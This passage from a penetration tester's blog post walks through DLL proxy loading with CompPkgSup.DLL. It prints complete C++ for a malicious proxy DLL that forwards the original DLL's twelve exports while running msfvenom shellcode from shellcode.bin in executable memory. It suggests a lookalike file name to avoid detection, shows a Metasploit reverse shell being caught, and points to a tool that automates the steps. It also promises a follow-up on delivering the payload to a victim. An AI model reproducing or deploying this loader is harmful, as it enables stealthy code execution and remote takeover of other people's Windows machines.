src="https://h4rithd.com/blog/content/images/2024/05/image-13.png" class="kg-image" width="1952" height="976" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-13.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-13.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-13.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-13.png 1952w" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-14.png" class="kg-image" width="2366" height="772" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-14.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-14.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-14.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-14.png 2366w" layout="responsive"></amp-img></figure><p>Now that we are absolutely sure, we can use the proxy loading method for the <code>CompPkgSup.DLL</code></p><h2 id="03-crafting-the-payload">03. Crafting the payload </h2><p>To initiate the proxy loading method, my first step was to create a payload. To demonstrate this scenario, I utilized <code>msfvenom</code> to generate a <code>shellcode</code> </p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-15.png" class="kg-image" width="2000" height="241" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-15.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-15.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-15.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-15.png 2400w" layout="responsive"></amp-img></figure><p>Next, we need to analyze the <code>CompPkgSup.DLL</code> file using the <code>pefile</code> Python module. You can install pefile via pip by typing <code>pip install pefile</code>. Make sure to take note of all functions.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-16.png" class="kg-image" width="2060" height="708" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-16.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-16.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-16.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-16.png 2060w" layout="responsive"></amp-img></figure><p>As you can see, there are 12 functions inside the DLL file. Now, we need to create a new malicious DLL file to run the payload and load these functions seamlessly. Let's open Visual Studio and start a new project. Select <code>C++</code> as the language and choose the <code>Dynamic-link Library (DLL)</code> template, as shown below.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-17.png" class="kg-image" width="2184" height="1554" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-17.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-17.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-17.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-17.png 2184w" layout="responsive"></amp-img></figure><p>Next, set the name as the legitimate name of our DLL.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-18.png" class="kg-image" width="1716" height="972" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-18.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-18.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-18.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-18.png 1716w" layout="responsive"></amp-img></figure><p>We needed to rename our <code>CompPkgSup.DLL</code> to a new name. In this example, I renamed it as <code>CompPkgSup-org.DLL</code>. However, in actual scenarios, we would rename it to a legitimate DLL name, such as <code>CompPkgSpu.DLL</code>, where we changed 'CompPkgS<strong>up</strong>' to 'CompPkgS<strong>pu</strong>'. To avoid confusion later on, I kept the name as <code>CompPkgSup-org.DLL</code> for demonstration purposes. Let's continue with the story</p><p>After creating a new project, we can remove all lines in the <code>dllmain.cpp</code> file and replace them as follows.</p><pre><code class="language-c++">#include "pch.h"
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

#pragma comment(linker, "/export:AreDvdCodecsEnabled=CompPkgSup-org.AreDvdCodecsEnabled,@1")
#pragma comment(linker, "/export:GetMediaComponentPackageInfo=CompPkgSup-org.GetMediaComponentPackageInfo,@2")
#pragma comment(linker, "/export:GetMediaComponentPackageInfoInternal=CompPkgSup-org.GetMediaComponentPackageInfoInternal,@3")
#pragma comment(linker, "/export:GetMediaExtensionCommunicationFactory=CompPkgSup-org.GetMediaExtensionCommunicationFactory,@4")
#pragma comment(linker, "/export:GetNetworkRequestCount=CompPkgSup-org.GetNetworkRequestCount,@5")
#pragma comment(linker, "/export:GetServerForPMP=CompPkgSup-org.GetServerForPMP,@6")
#pragma comment(linker, "/export:GetSystemNativeProcessorSignature=CompPkgSup-org.GetSystemNativeProcessorSignature,@7")
#pragma comment(linker, "/export:InstantiateComponentFromPackage=CompPkgSup-org.InstantiateComponentFromPackage,@8")
#pragma comment(linker, "/export:IsMediaBehaviorEnabled=CompPkgSup-org.IsMediaBehaviorEnabled,@9")
#pragma comment(linker, "/export:RegisterServerForPMP=CompPkgSup-org.RegisterServerForPMP,@10")
#pragma comment(linker, "/export:RequireNetworkDuringMediaTaskCompletion=CompPkgSup-org.RequireNetworkDuringMediaTaskCompletion,@11")
#pragma comment(linker, "/export:UnregisterServerForPMP=CompPkgSup-org.UnregisterServerForPMP,@12")


DWORD WINAPI DoMagic(LPVOID lpParameter)
{

    FILE* fp;
    size_t size;
    unsigned char* buffer;

    fp = fopen("shellcode.bin", "rb");
    fseek(fp, 0, SEEK_END);
    size = ftell(fp);
    fseek(fp, 0, SEEK_SET);
    buffer = (unsigned char*)malloc(size);


    fread(buffer, size, 1, fp);

    void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    memcpy(exec, buffer, size);

    ((void(*) ())exec)();

    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    HANDLE threadHandle;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
 
        threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
        CloseHandle(threadHandle);

    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}</code></pre><p>As you can see in the code, we are linking all legitimate functions from our <code>CompPkgSup.dll</code> (malicious) to <code>CompPkgSup-mal.dll</code> (original). These links can be obtained using the Python <code>pefile</code> module.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-19.png" class="kg-image" width="2884" height="1642" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-19.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-19.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-19.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-19.png 2400w" layout="responsive"></amp-img></figure><p>You can compare the above image to get an idea of how to link those functions into our code. Additionally, as shown in the image below, in the <code>DoMagic</code> function we are attempting to read the <code>shellcode.bin</code> file and load it into memory.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-21.png" class="kg-image" width="2884" height="1642" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-21.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-21.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-21.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-21.png 2400w" layout="responsive"></amp-img></figure><p>Let's compile this into a DLL file. Before completing it, make sure to understand the architecture of your CPU. Here, I am compiling it as a 64-bit program.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-22.png" class="kg-image" width="2512" height="1328" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-22.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-22.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-22.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-22.png 2400w" layout="responsive"></amp-img></figure><h2 id="04-execute">04. Execute </h2><p>Finally, we are all ready to run this program, so please place everything into one folder as indicated below.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-28.png" class="kg-image" width="2050" height="694" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-28.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-28.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-28.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-28.png 2050w" layout="responsive"></amp-img></figure><p>Before running this, I will start my Metasploit listener on my Kali machine as shown below.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-25.png" class="kg-image" width="2000" height="1149" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-25.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-25.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-25.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-25.png 2400w" layout="responsive"></amp-img></figure><p>Once we are ready, we can run it.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-27.png" class="kg-image" width="2000" height="1311" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-27.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-27.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-27.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-27.png 2400w" layout="responsive"></amp-img></figure><p>As you can see in the image below, we have successfully obtained the reverse shell.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-26.png" class="kg-image" width="2000" height="1092" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-26.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-26.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-26.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-26.png 2400w" layout="responsive"></amp-img></figure><h2 id="05-ending">05 Ending</h2><p>Would you be surprised if I told you that the above C++ code can be automatically generated using any tool? Yes, it can. Allow me to introduce a tool called <a href="https://github.com/Flangvik/SharpDllProxy?ref=192.168.184.133">SharpDllProxy</a> from <a href="https://twitter.com/Flangvik?ref=192.168.184.133">Flangvik</a>. After cloning the repository locally, you need to complete it through Visual Studio and copy both the <code>shellcode.bin</code> file and our <code>CompPkgSup.DLL</code> (Original DLL) file into the folder. Then, you can run the command below to generate the C++ code.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-29.png" class="kg-image" width="3506" height="1092" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-29.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-29.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-29.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-29.png 2400w" layout="responsive"></amp-img></figure><p>Afterwards, you can navigate to the output folder to locate the original DLL file, which has been renamed as a temporary file, as well as the C++ code needed to compile as our proxy DLL file. You can use the same method that we used to complete our proxy DLL through Visual Studio.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-30.png" class="kg-image" width="3134" height="1228" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-30.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-30.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-30.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-30.png 2400w" layout="responsive"></amp-img></figure><p>So guys, this is the end of our first episode. Next time, we will discuss a very interesting topic on how we can embed into an ISO file and deliver it to the victim. Until then, goodbye!</p>

            </section>

        </article>
    </main>
    <footer class="page-footer">
            <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed" alt="h4rithd.com"></amp-img>
        <h3>h4rithd.com</h3>
            <p>- Penetration Tester | Ethical Hacker | Security Researcher -</p>
        <p><a href="../../index.html">Read more posts →</a></p>
        <a class="powered" href="https://ghost.org" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 156 156"><g fill="none" fill-rule="evenodd"><rect fill="#15212B" width="156" height="156" rx="27"/><g transform="translate(36 36)" fill="#F6F8FA"><path d="M0 71.007A4.004 4.004 0 014 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0130 84H4a4 4 0 01-4-4.007v-8.986zM50 71.007A4.004 4.004 0 0154 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0180 84H54a4 4 0 01-4-4.007v-8.986z"/><rect y="34" width="84" height="17" rx="4"/><path d="M0 4.007A4.007 4.007 0 014.007 0h41.986A4.003 4.003 0 0150 4.007v8.986A4.007 4.007 0 0145.993 17H4.007A4.003 4.003 0 010 12.993V4.007z"/><rect x="67" width="17" height="17" rx="4"/></g></g></svg> Published with Ghost</a>
    </footer>
    
</body>
</html>
